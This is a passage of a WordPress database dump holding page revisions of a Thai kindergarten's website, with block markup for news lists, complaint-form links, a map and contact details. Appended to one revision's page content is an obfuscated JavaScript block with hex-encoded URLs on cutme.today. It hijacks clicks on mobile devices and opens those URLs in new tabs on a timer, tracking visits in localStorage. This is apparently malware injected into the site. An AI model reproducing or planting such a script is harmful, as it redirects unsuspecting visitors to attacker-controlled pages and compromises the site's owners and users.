วไป.png\",\"customLink\":\"https://forms.gle/ogsMCed1YfypogeK8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"https://forms.gle/ZyUhBS2TYmZiZVPR6\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"https://forms.gle/6upfY9jUcbu2kPti8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"news\"}],\"meta-fieldsfSize\":{\"md\":11},\"headingBgColor\":\"#00000000\",\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":11},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":45},\"thumbnailHeight\":{\"md\":260},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"จดหมายข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"จดหมายประชาสัมพันธ์\",\"value\":\"%e0%b8%88%e0%b8%94%e0%b8%ab%e0%b8%a1%e0%b8%b2%e0%b8%a2%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d1925.9723083104054!2d104.32273680156584!3d15.106380799999997!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116e380deaa317f%3A0x4d9751ab2c19279f!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lit4LiZ4Li44Lia4Liy4Lil4Lin4Lix4LiU4Lie4Lij4Liw4LmC4LiVICjguJ3guYjguLLguKLguKHguLHguJjguKLguKEp!5e0!3m2!1sth!2sth!4v1722088475215!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนอนุบาลวัดพระโต</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">1193 ถนนขุขันธ์ ตำบลเมืองเหนือ อำเภอเมืองศรีสะเกษ จังหวัดศรีสะเกษ 33000</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ : 0-4561-2730</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D61556083436494&tabs=timeline&width=330&height=80&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','19-revision-v1','','','2024-08-28 11:39:22','2024-08-28 04:39:22','',19,'http://watprato.ssk.in.th/?p=244',0,'revision','',0),
(245,2,'2024-08-28 11:45:17','2024-08-28 04:45:17','<!-- wp:kadence/rowlayout {\"uniqueID\":\"19_238a19-ce\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"19_55c486-08\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column19_55c486-08\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"afb41c1a\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f1b9a3f2\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"41ac449a\",\"mediaId\":85,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-41ac449a\"><img class=\"gb-image gb-image-41ac449a\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/awpt.gif\" alt=\"\" title=\"awpt\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f8167df0\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":3,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":46,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/นายอนุศักดิ์-พันธ์งาม-png.png\" alt=\"\" title=\"นายอนุศักดิ์ พันธ์งาม png\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"19_66bc98-69\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns19_66bc98-69\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"19_3d590e-59\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"sizePreset\":\"small\",\"background\":\"#cf2e2e\",\"backgroundHover\":\"#f78da7\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist 